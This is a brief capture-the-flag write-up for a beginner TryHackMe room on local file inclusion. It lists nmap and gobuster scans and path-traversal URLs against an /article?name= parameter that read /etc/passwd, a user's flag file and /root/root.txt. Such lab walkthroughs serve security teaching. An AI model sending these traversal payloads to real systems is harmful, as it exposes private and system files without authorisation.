URL: https://tryhackme.com/room/inclusion [Easy]
Tags:
Description of the room:
This is a beginner level room designed for people who want to get familiar with Local file inclusion vulnerability.
If you have any kind of feedback please reach out to me on twitter at 0xmzfr
nmapRan the following:
nmap -sC -sV xxx.xxx.xxx.xxx
Interesting ports found to be open:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Also see: nmap.log
gobusterRan the following:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://xxx.xxx.xxx.xxx
Interesting folders found:
/article (Status: 500) [Size: 290]
See also: gobuster.log
What we discover is there is only one folder on this server (that is /article) and as a name argument, it seems to take a file name.
So, we go back, back, back up a few directories to see if we can get the web server to print out the contents of other interesting files on the server.
http://10.10.110.200/article?name=../../../../etc/passwd
http://10.10.110.200/article?name=../../../../home/falconfeast/user.txt
http://10.10.110.200/article?name=../../../../root/root.txt
By using this technique, we were able to get a value username (falconfeast) and read the user.txt file, and also step into the /root folder to read the root.txt file. The contents of those files were the two flags for this room.
We never got direct access to this box, so no access to maintain.
We never had direct access. Nothing to do.
Completed: [2022-01-19 21:50:56]